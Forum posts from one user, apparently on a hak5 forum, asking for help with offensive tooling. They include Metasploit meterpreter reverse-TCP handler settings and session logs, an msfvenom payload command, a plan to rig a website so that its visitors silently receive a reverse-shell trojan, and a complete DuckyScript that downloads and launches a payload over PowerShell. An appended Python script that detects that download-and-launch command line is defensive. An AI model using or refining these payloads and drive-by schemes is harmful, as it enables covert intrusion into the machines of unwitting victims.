Posts posted by hanshaze

  1. Hi....

    I'm trying to "hack" my iOS 11 iPhone 5S with these settings in Metasploit

    msf exploit(multi/handler) > show options
    Module options (exploit/multi/handler):
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    Payload options (apple_ios/aarch64/meterpreter_reverse_tcp):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.178.179  yes       The listen address
       LPORT  443              yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       0   Wildcard Target

    Then I take my iOS device, open Safari and visit the URL Metasploit shows me.....

    In my case this would be https://192.168.178.179:443

    If the page opens, Metasploit gives me this --->

    msf exploit(multi/handler) > run
    [*] Started reverse TCP handler on 192.168.178.179:443
    [*] 192.168.178.23 - Meterpreter session 7 closed.  Reason: Died
    [*] Meterpreter session 7 opened (127.0.0.1 -> 192.168.178.23:51820) at 2018-03-15 00:17:53 +0100
    [*] Meterpreter session 8 opened (192.168.178.179:443 -> 192.168.178.23:51821) at 2018-03-15 00:17:55 +0100
    [*] 192.168.178.23 - Meterpreter session 8 closed.  Reason: Died
    [*] Meterpreter session 9 opened (192.168.178.179:443 -> 192.168.178.23:51822) at 2018-03-15 00:17:56 +0100
    [*] 192.168.178.23 - Meterpreter session 9 closed.  Reason: Died
    [*] 192.168.178.23 - Meterpreter session 10 closed.  Reason: Died
    [*] Meterpreter session 10 opened (127.0.0.1 -> 192.168.178.23:51823) at 2018-03-15 00:17:57 +0100

    What's the problem?

    Should I forward port 51820? Or which one do I have to choose?

    Thanks for helping and stay wet!

  2. Hello everybody......

    I have recently added a domain and some webspace .....

    My goal is now to get a reverse shell to the visitor of that page!
    That means I have to infect this site in such a way that if someone calls the page he gets pwnd! And best without big spectacle and 3000 confirmations to be really, really sure to install my trojan!

    My LHOST is a Pi 2 with Kali!

    To generate my code I use ps1encode!
    What output file format do I need to take? php? js? html? acab? Please help!
    There are otherwise no further files on the server!

    2. Question: How or where or with what do I hide the code properly?
    Is there something like a directive line?

    MUST I use beef-xss or is there another way to bypass user-confirmation?

    Who can help?

  3. Thanks for your answer......

    Yes, the LT is plugged into a direct power source.....

    So at least one of the two IPs should be achievable, but this is not the case...

    Do I have to forward port 22 for 172.16.84.1? Or for 192.168.178.xx?

    For now this is the output of my screen

    [image: neu.png]

  4. My goal is to make my LanTurtle accessible over the entire LAN or the very best in the WAN.

    For this I proceed as follows

    Step 1: Without LanTurtle plugged in -> Windows 10 -> ipconfig

    Step 2: LanTurtle via Ethernet cable to the router, other side --> USB at the laptop -> ipconfig

    Step 3: SSH into the LanTurtle

    Step 4: Update modules

    Now, if I unplug the LanTurtle after Step 4 and connect it to the LAN like in those two pics below, I can't receive the LanTurtle over LAN anything else....

    [two photos]

    What is my fault?

  5. I hope someone can help ....

    I have a WiFi Pineapple Nano with a 16 gigabyte SD card!

    All modules installed on the Nano have been installed in the sd-dir. Without exception!

    However, when I ran via ssh

    wget -qO- https://raw.githubusercontent.com/kbeflo/wifite-openwrt/master/INSTALL.sh | bash -s - -v -v

    I received the message ---> on the device is no more space left!

    How do I clean up the pineapple-disk?

    And how do I install wifite in the sd dir?

    Respect for the entire hak5 workforce!

    You are mad! 

  6. Hi....... I have a problem, hope somebody can help me!

    Ok,.......

    I have created a Reverse TCP DNS payload with MSFVenom......

    Now I want to execute this file by plugging in the USB Rubber Ducky!

    How do I do this?

    Do I have to convert my payload with Base64?

    And if yes, how could I do this?

    Please help me!

  7. Hello....

    I have a question about the USB Rubber Ducky...
    Hope you can help me!

    My attack computer is a Raspberry Pi 2 with Raspbian installed.
    My victim PC is a Windows 10 Notebook.

    I want to get a meterpreter reverse tcp-session to my Raspberry Pi from the victim if I plug my USB Rubber Ducky into the Windows PC.

    How I proceeded:

    1. I created the “payload.exe” on the Raspberry Pi
    ~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.35 LPORT=443 -f exe -o /home/pi/payload.exe

    2. I created a listener file and ran it on the Raspberry Pi
    ~$ sudo nano /home/pi/listener.rc

    To test how things work, I saved the “payload.exe” on the victim machine's HDD and ran it as the system administrator.
    This is what happened on the Pi's screen:

    [image: RKKEOwO.png]

    so far so good.....

    My idea now was to let the USB Rubber Ducky do two things for me after plug-in

    1. download my “payload.exe” from the internet
    2. install it on the victim PC with admin rights

    So I created an “inject.bin” with the Duck Toolkit Encoder.
    This is the code I used (changed the download URL to an existing one)

    DELAY 500
    CONTROL ESCAPE
    DELAY 200
    STRING cmd.exe
    DELAY 100
    ENTER
    DELAY 500
    STRING cd %TEMP%
    DELAY 100
    ENTER
    DELAY 100
    STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe,%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe"
    DELAY 100
    ENTER
    DELAY 100
    ALT SPACE
    DELAY 50
    DOWN
    DELAY 50
    DOWN
    DELAY 50
    DOWN
    DELAY 50
    DOWN
    DELAY 50
    DOWN
    DELAY 50
    ENTER
    DELAY 50
    GUI d

    Now, the code runs through without any errors if I plug in the Rubber Ducky.
    But the problem is that meterpreter gets no connection with the Ducky!

    Why doesn't my DuckyScript execute the downloaded file?
    I don't understand what my fault is!

    What's wrong? Please help me!

    Greetings to Darren and the whole hak5-Team!
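
Added example, not part of the original posts and not hak5 or Metasploit code: a defender-side check that scores PowerShell process-creation records for the download-and-launch command line typed by the DuckyScript in the last post. The event fields, host names, weights and threshold are assumptions, and the sample records are constructed.

```python
import re

# Indicator patterns drawn from the command line in the post above.
# Weights and threshold are assumptions for illustration; tune on your own baseline.
INDICATORS = {
    "webclient": (re.compile(r"new-object\s+(system\.)?net\.webclient", re.I), 2),
    "downloadfile": (re.compile(r"\.downloadfile\s*\(", re.I), 2),
    "start_process": (re.compile(r"\bstart-process\b", re.I), 1),
    # cmd.exe expands %TEMP% before PowerShell starts, so match both forms.
    "temp_exe": (re.compile(r"(%temp%|\\appdata\\local\\temp)\\[^\s'\"]+\.exe", re.I), 2),
    "http_exe": (re.compile(r"https?://[^\s'\"]+\.exe", re.I), 1),
}
ALERT_THRESHOLD = 5

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation records (hypothetical hosts, users and paths).
SAMPLE_EVENTS = [
    # Mirrors the command line from the post, with %TEMP% already expanded.
    {"host": "WS-01", "image": PS,
     "command_line": r'''powershell (new-object System.Net.WebClient).DownloadFile('http://example.invalid/payload.exe,C:\Users\test\AppData\Local\Temp\payload.exe'); Start-Process "C:\Users\test\AppData\Local\Temp\payload.exe"'''},
    # Benign: an installer launched from the temp directory, no download.
    {"host": "WS-02", "image": PS,
     "command_line": r'powershell Start-Process "C:\Users\test\AppData\Local\Temp\setup.exe"'},
    # Benign: listing the temp directory.
    {"host": "WS-03", "image": PS, "command_line": "powershell Get-ChildItem $env:TEMP"},
    # Not PowerShell, so it is skipped by detect().
    {"host": "WS-04", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c cd %TEMP%"},
]


def score(command_line):
    """Return (total weight, sorted indicator names) for one command line."""
    hits = [(n, w) for n, (rx, w) in INDICATORS.items() if rx.search(command_line)]
    return sum(w for _, w in hits), sorted(n for n, _ in hits)


def detect(events):
    """Return alerts for PowerShell events scoring at or above the threshold."""
    alerts = []
    for ev in events:
        if "powershell" not in ev["image"].lower():
            continue
        total, names = score(ev["command_line"])
        if total >= ALERT_THRESHOLD:
            alerts.append({"host": ev["host"], "score": total, "indicators": names})
    return alerts


if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Scoring several weak indicators together keeps the temp-directory installer on WS-02 below the threshold while the combined download-and-launch line on WS-01 alerts.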
